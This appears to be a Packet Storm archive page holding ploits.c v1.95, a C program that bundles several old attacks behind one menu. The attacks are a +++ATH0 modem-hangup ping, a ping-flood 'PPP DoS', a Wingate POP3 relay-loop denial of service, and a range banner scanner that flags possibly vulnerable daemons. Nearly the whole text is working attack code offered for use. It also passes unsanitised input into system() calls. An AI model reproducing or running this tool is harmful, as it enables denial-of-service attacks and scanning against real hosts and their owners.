Ploits.c v1.95 integrates stuff.c, ath0.c, and banner.c into one attack tool.
755a2a39dd379973cf20b9d77886a0e3abe6c9404233bc780362699329fca097/* Name: ploits.c v1.95
* Author: Cyber_Bob (Cyber_Bob@bak.rr.com)
* Made: Code Crusader 2.1.4 (even l33ter scr1pt maker y0 ;)
* Compiled: linux 2.2.16 i686 (slackware 7.1)
* gcc version 2.91.66
* gcc ploits.c (optional: -O# -ggdb -DDEBUG) -o ploits
*
* This is code for you ppl with cable modems that don't feel like
* downloading stuff.c, ath0.c, or banner.c, etc. seperately... Basically
* this script has them all combined into one program. This program is
* better managed than its previous version and has been made with error
* checking software so it shouldn't be too sloppy or erroneous. I'm going
* to update this more often from now on so look for updated versions.
*
* [Shoutz/IRC] #outlaw, #NukeZ, #twlc, and #assassins crew'z
* [Shoutz/People] soulFate, n0th|ng, L^WaRrioR, VIRILATOR, anti-, WWsBabe,
* DePhAzEr (Where the fuck have you been?!?!), trunck, f0x,
* minner, Colly^, Phear, firebird1, sgxx (owned by ath0 :P),
* everybody from #suid. and anybody I forgot (sorry =).
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/errno.h>
#define VERSION "1.95"
#define DELAY 500000
int sock,p1, p2, ctr2;
unsigned long start, end, ctr;
struct sockaddr_in sa;
struct hostent *hp;
int menu(void);
void ath0(void);
void stuff(void);
void loopmail(void);
void banner(void);
int main(void)
{
printf("\n\t\tPloits v%s by Cyber_Bob\n", VERSION);
puts("\nNote: Don't use choice 2 if you have a PPP connection to");
puts(" the internet or you will DoS yourself!!!!!!!!!!!!!\n");
puts("Warning: Only type integers at the choice prompt!!\n\n");
while(1)
{
switch(menu())
{
case 1:
{
ath0();
break;
}
case 2:
{
if(getuid() != 0 || getgid() != 0)
{
fprintf(stderr,"\nNon-Fatal Error, you must be root for choice 2... returning to menu!\n");
break;
}
stuff();
break;
}
case 3:
{
loopmail();
break;
}
case 4:
{
banner();
break;
}
case 5:
{
printf("\nThank you for using ploits.c!\n");
exit(0);
}
default:
{
printf("\nNon-Fatal Error, choice not recognized... returning to menu!\n");
break;
}
}
}
return 0;
}
int menu(void)
{
int reply;
do{
puts("\n\n\n\n1\t-\t+++ATH0 Exploit");
puts("2\t-\tPPP DoS Attack");
puts("3\t-\tWingate 4.0.1 on Win98 DoS Attack");
puts("4\t-\tBanner\\Security Scanner");
puts("5\t-\tExit, return to prompt.");
printf("\nChoice: ");
scanf("%d", &reply);} while(reply < 1 || reply > 5);
return reply;
}
void ath0(void)
{
char command[256] = "/bin/ping -c 5 -p 2b2b2b415448300d ";
char host[100];
printf("\nEnter Hostname: ");
scanf("%s", host);
if((hp=(struct hostent *)gethostbyname(host))==NULL) {
perror("\nFATAL ERROR: failed to resolve host");
exit(1);
}
strcat(command, host);
puts("\n\n\nNow sending 5 ICMP's containing the +++ATH0 string to...");
printf("---------------------------------------------\n%s\n\n\n",host);
system(command);
puts("\n\n\n\nDone sending. If packet loss = 100%");
puts("The target is dead, unless firewalled.\n");
}
void stuff(void)
{
char command[256] = "/bin/ping -f -p 7e7d -s 100 ";
char host[100];
printf("\nEnter Hostname: ");
scanf("%s", host);
if((hp=(struct hostent *)gethostbyname(host))==NULL) {
perror("\nFATAL ERROR: failed to resolve host");
exit(1);
}
strcat(command, host);
puts("\n\n\nNow bombing the shit out of...");
printf("---------------------------------------------\n%s\n\n\n",host);
puts("Press CTRL +C to stop. (WARNING: Will not return to menu!)\n");
system(command);
}
void loopmail(void)
{
char *tmp1= "@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1\
@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1@127.0.0.1";
char tmp[920], *userloop, *pass= "PASS whatever", host[100];
if((userloop=(char *) malloc(1000 * sizeof(char))) == NULL)
{
fprintf(stderr,"\nFATAL ERROR: memory allocation error");
exit(1);
}
printf("\nEnter Hostname: ");
scanf("%s", host);
if((hp=(struct hostent *)gethostbyname(host)) == NULL) {
perror("\nFATAL ERROR: failed to resolve host");
exit(1);
}
if((sock=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
perror("\nFATAL ERROR: could not open socket");
exit(1);
}
sa.sin_family=AF_INET;
sa.sin_port=htons(110);
memcpy((char *)&sa.sin_addr, (char *)hp->h_addr,hp->h_length);
if(connect(sock,(struct sockaddr *)&sa, sizeof(sa)) != 0) {
perror("\nFATAL ERROR: could not connect to host");
exit(1);
}
printf("Preparing to DoS wingate on \"%s\"... ", host);
fflush(stdout);
fflush(stdin);
printf("Done.\n");
printf("Enter valid \"USER username@forwardingPop3\": ");
scanf("%s", tmp);
printf("\nConstructing/Sending relay loop strings. ");
strcat(tmp, tmp1);
strcpy(userloop, tmp);
if((write(sock, userloop, sizeof(userloop))) == -1) {
perror("\nFATAL ERROR: could not write to socket");
exit(1);
}
usleep(500000);
if((write(sock, pass, sizeof(pass))) == -1) {
perror("\nFATAL ERROR: could not write to socket");
exit(1);
}
}
void banner(void)
{
char ips[20], ipe[20],data[1000];
int i=1;
printf("\nEnter Start IP: ");
scanf("%s", ips);
printf("\nEnter End IP: ");
scanf("%s", ipe);
printf("\nEnter Start Port: ");
scanf("%d", &p1);
printf("\nEnter End Port: ");
scanf("%d", &p2);
puts("\nBeginning Scan...\n--------------------------------------\n");
start = inet_addr(ips);
end = inet_addr(ipe);
for(ctr = ntohl(start);ctr <= ntohl(end);ctr++) {
printf("Reading info for host #%d...\n\n",i++);
if((ctr & 0xff) == 0) ctr++;
if((ctr & 0xff) ==255) ctr++;
for(ctr2 = p1;ctr2 <= p2;ctr2++) {
sa.sin_family=AF_INET;
sa.sin_port=htons(ctr2);
sa.sin_addr.s_addr=htonl(ctr);
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if((connect(sock,(struct sockaddr *)&sa,sizeof(sa))) == -1) {
puts("<!> Connection refused...");
}
fflush(stdin);
memset(data,0,sizeof(data));
read(sock,&data,1000);
if(ctr2 == 21) {
printf("<!> Port: %d (FTPD)\nBanner: %s\n", ctr2, data);
}
else if(ctr2 == 23) {
printf("<!> Port: %d (TELNETD)\nBanner: %s\n", ctr2, data);
}
else if(ctr2 == 79) {
printf("<!> Port: %d (FINGERD)\nBanner: %s\n", ctr2, data);
}
else if(ctr2 == 80) {
printf("<!> Port: %d (HTTPD)\nBanner: %s\n", ctr2, data);
}
else if(ctr2 == 113) {
printf("<!> Port: %d (IDENTD)\nBanner: %s\n", ctr2, data);
}
else if(ctr2 == 1080) {
printf("<!> Port: %d (PROXY)\nBanner: %s\n", ctr2, data);
}
else {
printf("Port: %d\nBanner: %s\n", ctr2, data);
}
puts("\nChecking for possible insecure daemons...\n");
if(strstr(data, "QPOP")!=NULL) {
puts("QPop daemon found, possible security risk...");
}
else if(strstr(data, "wu-")!=NULL) {
puts("WU-FTP daemon found, possible security risk...");
}
else if(strstr(data, "sendmail")!=NULL) {
puts("Sendmail daemon found, possible security risk...");
}
else if(strstr(data, "ProFTPD")!=NULL) {
puts("ProFTP daemon found, possible security risk...");
}
else if(strstr(data, "Wingate")!=NULL || strstr(data, "WinGate")!=NULL) {
puts("Wingate daemon found, possible security risk...");
}
else {
puts("None of the daemons checked for were found!");
}
puts("-----");
usleep(DELAY);
}
puts("\n--------------------------------------");
}
puts("Finished!");
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed